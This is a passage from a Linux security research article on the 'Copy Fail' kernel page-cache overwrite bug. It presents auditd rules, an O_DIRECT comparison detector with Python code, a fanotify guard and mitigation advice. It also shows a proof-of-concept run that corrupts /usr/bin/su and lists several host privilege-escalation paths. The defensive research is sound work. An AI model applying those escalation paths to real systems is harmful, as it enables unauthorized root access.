-a always,exit -F arch=b64 -S splice -k copyfail_splice
EOF
augenrules --load
In container environments, legitimate AF_ALG usage is rare, so Falco and other eBPF tools can raise real-time alerts on AF_ALG socket creation inside containers. On bare metal or VMs, however, legitimate users such as the OpenSSL afalg engine and dm-crypt can produce continuous noise. Even matching the combination of AF_ALG and splice cannot reliably distinguish legitimate crypto operations from exploitation. Opening an AF_ALG socket and calling splice are legal kernel interfaces.
The core limitation is that syscall-based detection cannot be zero-false-positive. It can only say that someone used AF_ALG; it cannot prove that someone exploited Copy Fail. It also has a coverage problem. As Chapter 5 showed, page-cache overwrite is a recurring vulnerability pattern. AF_ALG-specific detection will miss Dirty Frag's AF_KEY path, and splice detection cannot distinguish legitimate zero-copy I/O. A blacklist of specific syscalls will always lag behind new variants.
A better approach is to detect the result, not the technique. For page-cache-only overwrite bugs such as Dirty Pipe, Copy Fail, and Dirty Frag, tampered page cache must differ from the original disk content. That difference is detectable.
8.2 General Detection: Comparing Page Cache with O_DIRECT
The O_DIRECT flag makes read() bypass the page cache and read directly from the block device. Compare an O_DIRECT read with a normal read(). If the results differ, the page cache has been tampered with:
Normal read: file -> [Page Cache] -> user buffer <- returns tampered data
O_DIRECT: file -> [Disk] -> user buffer <- returns original data
If the two differ, the Page Cache has been modified illegally.
This method has three important advantages:
- Generality. It detects all vulnerabilities that only modify page cache, including Copy Fail, Dirty Pipe, Dirty Frag, and future bugs with the same primitive. It is not tied to any specific attack mechanism. Dirty COW is the exception because it writes modified data back to disk through page writeback; O_DIRECT sees the modified data too, so traditional file-integrity checks such as rpm -V, AIDE, or Tripwire are needed.
- Determinism. For files that are not open for writing by any process, a mismatch between page cache and disk is absolutely abnormal. The Linux kernel's deny_write_access() mechanism prevents normal simultaneous write-and-execute situations.
- Result-based detection. Even if the attacker uses an unknown vulnerability, any page-cache-only tampering produces a detectable mismatch.
I validated O_DIRECT detection on CentOS 8 with XFS for both overlay2 layer files and host SUID files. Using host /usr/bin/su as an example:
# Copy Fail tampers with the ELF header of /usr/bin/su.
python3 poc_marker.py /usr/bin/su
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# O_DIRECT comparison immediately detects the mismatch.
# Page cache [0:16]: deadbeef020101000000000000000000 <- tampered
# O_DIRECT [0:16]: 7f454c46020101000000000000000000 <- original ELF header from disk
# [ALERT] SUID binary TAMPERED! 4 bytes differ at: [0, 1, 2, 3]
Implementation detail: O_DIRECT requires the memory address and read length to be aligned to the filesystem block size, usually 4096 bytes. Use posix_memalign() to allocate an aligned buffer. ext4, XFS, Btrfs, and overlay2 on top of ext4/XFS support O_DIRECT. tmpfs does not, but tmpfs is less likely to be the primary attack target.
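The comparison can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not the detector used in the experiment: it compares only the first 4096 bytes, assumes that 4096 satisfies the alignment requirement on the target filesystem, and uses an anonymous mmap as the aligned buffer in place of posix_memalign(). The function names are illustrative.

```python
import mmap
import os

BLOCK_SIZE = 4096  # assumed alignment, as discussed above


def read_cached(path, length=BLOCK_SIZE):
    """Normal buffered read, served from the page cache when the page is resident."""
    with open(path, "rb") as handle:
        return handle.read(length)


def read_direct(path, length=BLOCK_SIZE):
    """Read the first `length` bytes with O_DIRECT, bypassing the page cache."""
    fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    try:
        # An anonymous mapping is page-aligned, so it is a valid O_DIRECT buffer.
        with mmap.mmap(-1, length) as buf:
            count = os.readv(fd, [buf])
            return buf[:count]
    finally:
        os.close(fd)


def diff_offsets(cached, direct):
    """Byte offsets where the two views differ, over their common length."""
    return [i for i, (a, b) in enumerate(zip(cached, direct)) if a != b]


def check_file(path, length=BLOCK_SIZE):
    """Return the differing offsets between the page-cache view and the on-disk view."""
    return diff_offsets(read_cached(path, length), read_direct(path, length))
```

A non-empty result from check_file("/usr/bin/su") would correspond to the alert shown above. On filesystems without O_DIRECT support, such as tmpfs, os.open is expected to raise OSError, which a caller should treat as "cannot verify" rather than "clean".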
8.3 Runtime Interception: fanotify Guard
O_DIRECT comparison answers whether tampering can be detected. The next question is when to check. Periodic full scans are not immediate, but checking every file open is too expensive.
Linux fanotify provides the FAN_OPEN_EXEC_PERM event on kernel 5.0 and later. When execve() is about to execute a file, the kernel sends a permission request to user space. A user-space program can read the file, perform checks, and respond with FAN_ALLOW or FAN_DENY. Combining O_DIRECT comparison with fanotify gives a real-time execution guard.
Design decisions:
- Monitor only SUID/SGID files. At startup, scan target directories and build a set of SUID/SGID files. Executions of non-SUID files are allowed immediately with no overhead.
- Skip root executions. Root already has full privilege and does not need SUID escalation. In a container-escape scenario, the tamperer may be root inside the container, but the victim is usually a normal host user executing a tampered SUID file. The Guard still blocks that case.
- Kernel compatibility. FAN_OPEN_EXEC_PERM requires kernel 5.0 or later. RHEL 8 has a backport and was verified. On older kernels, fall back to FAN_OPEN_PERM, intercept all open events, and filter in user space. This is slightly more expensive but functionally equivalent.
- No extra write-fd check is needed. If a package manager is updating a SUID file, the kernel itself rejects execve() with ETXTBSY through deny_write_access(). A legitimate update does not create a false positive execution event.
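The first two design decisions can be sketched as follows. This is a minimal illustration of the startup scan and the per-event filter only; the fanotify event loop itself is omitted because the Python standard library has no fanotify binding. The names find_suid_sgid and needs_check are hypothetical, and check_root mirrors the option shown in the Guard log below.

```python
import os
import stat


def find_suid_sgid(roots):
    """Walk `roots` and return the set of regular files with SUID or SGID set."""
    found = set()
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    info = os.lstat(path)
                except OSError:
                    continue  # entry vanished or is unreadable
                is_special = info.st_mode & (stat.S_ISUID | stat.S_ISGID)
                if stat.S_ISREG(info.st_mode) and is_special:
                    found.add(os.path.realpath(path))
    return found


def needs_check(path, uid, protected, check_root=False):
    """Decide whether an exec event should go through the O_DIRECT comparison."""
    if uid == 0 and not check_root:
        return False  # root executions are skipped by default
    return os.path.realpath(path) in protected
```

With protected = find_suid_sgid(["/usr"]), every exec event whose path is not in the set can be answered with FAN_ALLOW immediately, which keeps the per-event cost close to a set lookup.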
Experiment result on CentOS 8 with kernel 4.18.0:
2026-05-08 06:57:34 INFO Found 21 SUID/SGID files
2026-05-08 06:57:34 INFO Monitoring mount (FAN_OPEN_EXEC_PERM): /usr
2026-05-08 06:57:34 INFO Guard active [ENFORCE] (event_size=24, check_root=False)
# After Copy Fail tampers with /usr/bin/su, a normal user tries to execute it:
2026-05-08 06:57:38 WARNING [ALERT] BLOCKED pid=2677362 uid=1000 /usr/bin/su
(page cache tampered at offset 0)
# User side:
$ /usr/bin/su
bash: /usr/bin/su: Operation not permitted (exit 126)
The Guard successfully blocks the tampered SUID binary at execve() time and prevents privilege escalation.
Detection Coverage
The fanotify Guard uses FAN_OPEN_EXEC_PERM to intercept execve(). By design, it only covers SUID/SGID binary execution. Compared with the host attack paths in Chapter 5:
| Attack path | fanotify Guard | Periodic O_DIRECT scan | Reason |
|---|---|---|---|
| SUID/SGID binary overwrite | Yes | Yes | Real-time block at execve() |
| /etc/passwd UID tampering | No | Yes | Configuration file read through open() and read() |
| PAM module authentication bypass | No | Yes | Shared library loaded through dlopen() |
| Shared-library live patching | No | Yes | Library mapped through mmap(), not execve() |
| /etc/profile command injection | No | Yes | Login shell reads and sources it |
| Cron script tampering | No | Yes | Executed by crond, but not a SUID file |
| ld.so.preload path hijack | No | Yes | Dynamic linker reads it at process startup |
| Container escape through layer sharing | No | Yes | Scan overlay lower layers periodically |
The fanotify Guard addresses the most urgent path: blocking tampered SUID binaries before they can escalate privileges. The other host paths and the container scenarios require periodic O_DIRECT scanning. Recommended scan priority is: PAM modules and shared libraries under /lib64/security/ and /lib64/*.so; critical configuration files such as /etc/passwd, /etc/profile, and /etc/ld.so.preload; cron scripts and container lower layers. For read-only files in lower layers, a page-cache versus disk mismatch is a certain anomaly with no false positives.
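A periodic scan in that priority order could be organized as in the sketch below. It is only an outline under assumptions: the /etc/cron.d/* pattern is a placeholder for "cron scripts", container lower-layer paths are host-specific and left out, and compare is a caller-supplied function that returns the differing offsets between the page-cache view and the O_DIRECT view of a file. The names SCAN_PATTERNS, expand_targets, and scan are illustrative.

```python
import glob

# Priority order from the paragraph above; adapt the patterns to the host.
SCAN_PATTERNS = [
    "/lib64/security/*.so",
    "/lib64/*.so",
    "/etc/passwd",
    "/etc/profile",
    "/etc/ld.so.preload",
    "/etc/cron.d/*",  # placeholder for cron scripts
]


def expand_targets(patterns):
    """Expand glob patterns in order, dropping duplicates but keeping priority."""
    seen, ordered = set(), []
    for pattern in patterns:
        for path in sorted(glob.glob(pattern)):
            if path not in seen:
                seen.add(path)
                ordered.append(path)
    return ordered


def scan(targets, compare):
    """Run `compare(path)` on each target and collect the files that differ."""
    findings = {}
    for path in targets:
        try:
            offsets = compare(path)
        except OSError:
            continue  # for example, a filesystem without O_DIRECT support
        if offsets:
            findings[path] = offsets
    return findings
```

Passing the comparison as a parameter keeps the scheduling logic independent of how the O_DIRECT read is implemented, so the same loop can be reused for host files and for overlay lower layers.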
9. Conclusion
Copy Fail is a classic cross-subsystem design-assumption conflict. authencesn assumed the output buffer was safe kernel memory. The algif_aead in-place optimization made the output buffer include page-cache pages. splice introduced file data into that path without copying. Each design decision was reasonable in isolation, but together they created a security bug that remained present for nine years.
At the host level, the attack surface extends far beyond the SUID overwrite demonstrated by the public PoC. The experiments confirmed seven independent privilege-escalation paths: the SUID/SGID binary overwrite itself plus six others, namely /etc/passwd UID tampering with one four-byte write, PAM authentication bypass that accepts any password for root, shared-library live patching without process restart, /etc/profile command injection, cron script tampering, and ld.so.preload path hijacking. These paths are not specific to Copy Fail; they apply to page-cache overwrite vulnerabilities in general. Shared libraries and PAM modules are especially persistent because mmap references prevent drop_caches from evicting the modified pages.
At the container level, Page Cache is global shared state that crosses isolation boundaries. Cross-container page-cache pollution and read-only volume bypass are real. After deeper validation, however, a generic zero-privilege container escape is architecturally infeasible in a standard Kubernetes environment: containerd and runc do not execute snapshot-layer files in the host context. Additional privileged configuration, such as hostPath or CAP_DAC_READ_SEARCH, is needed to turn page-cache tampering into host escape. Docker's docker export can persist tampered data, and docker diff does not reveal it, which makes the bug valuable in supply-chain scenarios.
From a broader view, Copy Fail is one member of the "splice zero-copy plus kernel in-place writeback" family of page-cache overwrite bugs. Dirty Pipe in 2022, Copy Fail in 2026, and Dirty Frag shortly afterward all show the same primitive in different subsystems. Dirty Frag was disclosed on 2026-05-07, only eight days after the public disclosure of Copy Fail on 2026-04-29. Defense should therefore not focus only on AF_ALG; the next variant may come from any zero-copy path that performs in-place writes.
For that reason, detection should move from detecting the technique to detecting the result. O_DIRECT bypasses page cache and reads directly from disk. Comparing it with normal read() detects page-cache tampering for all page-cache-only bugs, including Copy Fail, Dirty Pipe, Dirty Frag, and future variants. Dirty COW remains an exception because it writes changes back to disk and must be detected by traditional file-integrity systems. For SUID/SGID binaries, combining O_DIRECT comparison with fanotify FAN_OPEN_EXEC_PERM allows real-time blocking at execve(). Other targets, such as PAM modules, shared libraries, and configuration files, should be covered by periodic O_DIRECT scans.
Defense and detection recommendations:
- Upgrade the kernel. This is the root fix.
- Deploy a seccomp profile that blocks AF_ALG in container environments. Docker 29.4.3 and later block AF_ALG by default through the AppArmor/SELinux container profile.
- Deploy a fanotify plus O_DIRECT Guard to block tampered SUID/SGID binaries at execution time.
- Periodically scan critical files with O_DIRECT: PAM modules, shared libraries, /etc/passwd, /etc/profile, /etc/ld.so.preload, and container lower layers.
- Use Auditd or Falco as baseline telemetry, recording AF_ALG usage as supporting evidence.
The vulnerability details were initially disclosed by Taeyang Lee. This article builds on that disclosure with independent root-cause analysis and experimental validation.
References
Vulnerability Disclosure and Analysis
- Taeyang Lee, Copy Fail: One-shot local privilege escalation via the Linux crypto API — xint.io
- NVD, CVE-2026-31431 — nvd.nist.gov
- Copy Fail official page — copy.fail
- Microsoft Defender, CVE-2026-31431 Copy Fail vulnerability enables Linux root privilege escalation — microsoft.com
- CISA Known Exploited Vulnerabilities Catalog — cisa.gov
Kernel Commits
- a5079d084f8b: 2011, authencesn module introduction
- 72548b093ee3: 2017, vulnerability introduced through algif_aead in-place optimization
- a664bf3d603d: 2026, vulnerability fixed by reverting the in-place behavior
Container Security Responses
- Juliet, We tested Copy Fail in Kubernetes: PSS Restricted + RuntimeDefault do not block AF_ALG — juliet.sh
- Stream Security, CVE-2026-31431: how Copy Fail behaves in Kubernetes — stream.security
- Percivalll, Copy Fail Kubernetes PoC — GitHub
- Docker seccomp fix, block AF_ALG in v29.4.2 — moby/moby issue
- Docker 29.4.3 regression fix using AppArmor/SELinux — release notes
- Sidero Labs / Talos response — siderolabs.com
- vArmor Copy Fail mitigation rules, AppArmor/BPF — GitHub
- iwanhae, copyfail-ebpf-k8s — GitHub
Distribution Security Advisories
- Ubuntu, Fixes available for CVE-2026-31431 (Copy Fail) — ubuntu.com
- Red Hat, RHSB-2026-02 Cryptographic Subsystem Privilege Escalation — access.redhat.com
- Debian Security Tracker, CVE-2026-31431 — security-tracker.debian.org
- SUSE, SUSE responds to the copy.fail vulnerability — suse.com
- Alpine Linux Security Tracker — security.alpinelinux.org
- Oracle Linux CVE Tracker — linux.oracle.com
- AlmaLinux, CVE-2026-31431 Copy Fail — almalinux.org
- Arch Linux Security Tracker — security.archlinux.org
- AWS Security Bulletin, CVE-2026-31431 — aws.amazon.com
- Bottlerocket issue #4821 — GitHub
- Fedora Discussion, Is Copy Fail patched in Fedora 43? — discussion.fedoraproject.org
- CloudLinux / KernelCare, Copy Fail live patches — blog.cloudlinux.com
Security Vendor Analysis
- Palo Alto Unit 42, Copy Fail: What You Need to Know — unit42.paloaltonetworks.com
- Wiz.io, CopyFail: Linux privilege escalation vulnerability — wiz.io
- Sysdig, CVE-2026-31431 Copy Fail: Linux kernel flaw lets local users gain root — sysdig.com
- Kudelski Security — kudelskisecurity.com
- SentinelOne Vulnerability Database — sentinelone.com
- Kodem Security, CVE-2026-31431 Remediation Runbook — kodemsecurity.com
Community Discussion and Reporting
- Hacker News discussion, including mitigation and WSL2 impact — news.ycombinator.com
- CyberKendra, A 732-byte Python script can get root — cyberkendra.com
Related Page-Cache Overwrite Vulnerabilities
- CVE-2016-5195 Dirty COW — dirtycow.ninja
- CVE-2017-1000405 Huge Dirty COW — Bindecy
- CVE-2022-0847 Dirty Pipe — dirtypipe.cm4all.com
- CVE-2026-43284 and CVE-2026-43500 Dirty Frag — dirtyfrag.io, GitHub PoC, oss-security